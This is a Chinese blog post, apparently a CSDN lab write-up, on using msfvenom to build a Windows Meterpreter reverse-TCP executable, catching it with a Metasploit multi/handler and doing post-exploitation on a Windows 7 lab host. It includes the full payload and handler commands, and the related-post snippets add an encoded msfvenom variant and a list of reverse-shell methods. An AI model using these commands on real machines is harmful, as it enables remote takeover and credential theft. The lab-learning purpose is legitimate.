利用windows恶意软件获取windows主机shell

最新推荐文章于 2024-07-11 21:47:44 发布
最新推荐文章于 2024-07-11 21:47:44 发布
阅读量520 收藏
点赞数
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xufenglai123/article/details/131695337
版权
  • 实验目的:
    • 模拟黑客利用windows恶意软件获取windows主机shell权限的过程
    • 熟悉操作使用的命令
  • 实验准备:
    • kali
    • 同网段的windows主机(关闭防火墙)
    • msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。
  • 实验内容:
    • 制作Windows恶意软件获取shell \
    • msfvenom的shell在windows中的使用
    • msfvenom生成shell.exe
  • 实验步骤
    • 制造恶意程序文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.24.131 LPORT=6060 -f exe

    • 出现载荷与exe文件大小表示成功了
    • 切换到相应界面,查看exe文件

    • 回到kali命令窗口
    • 进入msf控制台 :msfconsole

    • 使用侦听模块设置侦听(加载模块,设置载荷和参数)
      • use exploit/multi/handler
      • set payload windows/meterpreter/reverse_tcp
      • set lhost 192.168.24.131
      • set lport 6060
    • 如图

    • exploit 运行

    • 将之前生成exe运行文件拷贝到win7系统中,并运行

    • 返回kali发现程序的运行已经被监控到,如图

    • 通过meterpreter进行后渗透操作,例如获取密码

    • 获取shell

    • 打开百度以及弹出计算器

    • 效果如图

  • 记录网络安全学习过程,希望能提高大家的安全意识。
栖息的梧桐树
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
windows 获取命令执行后的结果_Shell脚本小技巧-教你获取脚本执行的具体内容及执行结果...
weixin_39968852的博客
12-13 2330
#shell编程##函数#在执行脚本的过程中,我们经常需要知道哪些命令执行成功还是失败,这时候可以使用系统变量去获取执行结果: $?但是有时候,我们的命令是通过变量来设置的,那么我们如何知道执行了哪些命令以及执行的状态是怎样的?后者比较简单,可以通过退出状态码进行判断,但是前者应该怎么去获取呢?下面就带你了解一下:1、获取命令执行结果我们都知道,在Shell中,通常只有两个执行结果,一个是0(执行...
获取Windows Shell的简单示例程序(一)
weixin_30565199的博客
07-30 381
昨天看了黑防2009年VC专辑上RITATV的一篇文章<编程实现远程shell获取>,对Windows shell获取总算是有了一个概念.在此作下整理,希望能给像我一样的菜鸟们提供一些参考.知识点:一,匿名管道.匿名管道是一个未命名的单向管道,通常在一个父进程和一个子进程之间传输数据.匿名管道只能实现本机上的两个进程之间的通信,而不能...
获取Shell后的操作
墨鱼菜鸡
06-21 989
对于Windows系统主机和Linux系统主机获取Shell后的操作都不同。 Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢? 第一步,先whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得...
制作windows和linux客户端恶意软件进行渗透
m0_47510703的博客
01-23 3490
一、生成Windows后门程序获取shell 使用msfvenom制作简易后门程序 msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe
windows shell编程
07-30
Windows Shell编程是Windows操作系统下的一种交互式环境编程技术,它允许用户通过命令行接口执行系统操作,编写脚本实现自动化任务。尽管随着图形用户界面(GUI)的发展,像JavaScript、Python和Java这样的高级编程...
Windows+Shell扩展编程完全指南.zip
09-01
在IT领域,Windows Shell扩展是一种强大的技术,它允许开发者自定义Windows操作系统的用户界面,以增强文件和文件夹的操作体验。本指南将深入探讨Windows Shell扩展编程,包括如何创建缩略图视图、右键菜单以及其他...
windows shell right click menu c++
02-05
标题 "windows shell right click menu c++" 涉及到的是使用C++编程语言在Windows操作系统中创建右键shell扩展菜单。这个主题是Windows API编程的一部分,它允许开发者自定义文件或文件夹的上下文菜单,即用户通过...
grant_Grant_windowsshell_
10-03
标题中的"grant_Grant_windowsshell_"暗示了这个压缩包的内容与Windows系统中授权权限有关,特别是通过命令行(CMD)脚本来实现。在Windows环境中,"grant"通常指的是赋予用户或用户组对特定资源(如文件夹)的访问...
windows adb shell tab键补全
03-15
总的来说,利用`adb shell`结合Windows CMD的`tab`键补全功能,能够极大地提升Android开发和调试的效率。理解并熟练掌握这一技巧,对于开发者来说是十分重要的。如果遇到补全功能不工作的情况,检查adb版本、CMD设置...
java 中钻石操作符 <> 的使用场景
qq_27390023的博客
07-10 245
钻石操作符在 Java 中的主要作用是简化泛型类型的实例化,减少代码冗余,使代码更加简洁和可读。它通过类型推断机制,让编译器自动推断出类型参数,而不需要程序员显式地重复类型参数。这样不仅减少了代码量,还减少了出错的可能性。
Python中的null是什么?
最新发布
分享Python、数据分析、人工智能前沿知识
07-11 153
null正确的发音是/n^l/,有点类似四声‘纳儿’,在计算机中null是一种类型,代表空字符,没有与任何一个值绑定并且存储空间也没有存储值。检查 None 的唯一性,它返回某一对象的唯一标识符,如果两个变量的 id 相同,那么它们实际上指向的是同一个对象。Python中其实没有null这个词,取而代之的是None对象,即特殊类型NoneType,代表空、没有。在Python中,None的用处有很多,比如作为变量初始值、作为函数默认参数、作为空值等等。总得来说,None是一个对象,而null是一个类型。
力扣之有序链表去重
qq_62636650的博客
07-10 1015
如果 p2 与 p3 的值重复,那么 p3 继续后移,直到找到与 p2 不重复的节点,p1 指向 p3 完成删除。如果 p2 与 p3 的值不重复,p1,p2,p3 向后平移一位,继续上面的操作。p2 为 null 的情况,比如链表为 1 1 1 null。p1 是待删除的上一个节点,每次循环对比 p2、p3 的值。p1.val == p2.val 那么删除 p2。p2 或 p3 为 null 退出循环。当 p2 == null 退出循环。
远程Linux机器图形化界面使用及音频转发
zuolj的专栏
07-08 698
对于一些远程Linux云机器,一般我们在使用时通过各种ssh连接工具连接,并使用命令行方式操作,但是部分需要图形化界面验证的应用,必须需要使用到远程机器的图形化功能,本文记录总结一些跟远程使用Linux机器图形化界面以及需要音频的一些方法。
.net C# 使用网易163邮箱搭建smtp服务,实现发送邮件功能
lxslxs的博客
07-11 605
/如果你的SMTP服务器不需要身份认证,则使用下面的方式,不过,目前基本没有不需要认证的了。mm.From = new MailAddress(this.FromEmailAddress, "管理员", Encoding.GetEncoding(936));//邮件正文的编码, 设置不正确, 接收者会收到乱码。
【EasyExcel】根据单元格内容自动调整列宽
Chuk
07-11 148
1.自定义Excel列宽样式策略类。
使用Delphi做蓝牙BLE开发的一个问题
pcplayer的博客
07-09 483
Delphi 的 BLE 开发,拖一个 TBlueToothLe 到界面上,使用这个控件,就可以进行 BLE 的开发,比如去连接一个蓝牙手环。Delphi 自带的 Demo 里面,有一个 BLEScanner 程序,可以作为开发的起点。
MybatisPlus 一些技巧
github_39423829的博客
07-11 411
允许在自定义的 SQL 中使用 Wrapper 的查询条件。Since 3.0.7 版本。参数命名:在自定义 SQL 时,传递 Wrapper 对象作为参数时,参数名必须为 ew,或者使用注解 @Param(Constants.WRAPPER) 明确指定参数为 Wrapper 对象。使用 ${ew.customSqlSegment}:在 SQL 语句中,使用 ${ew.customSqlSegment} 来引用 Wrapper 对象生成的 SQL 片段。// Mapper 层编写自定义 SQL 语句。
springboot+vue项目实战2024第四集修改文章信息
github_36510643的博客
07-11 174
【代码】springboot+vue项目实战2024第四集修改文章信息。
windows 反弹shell
07-29
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows下反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows下反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值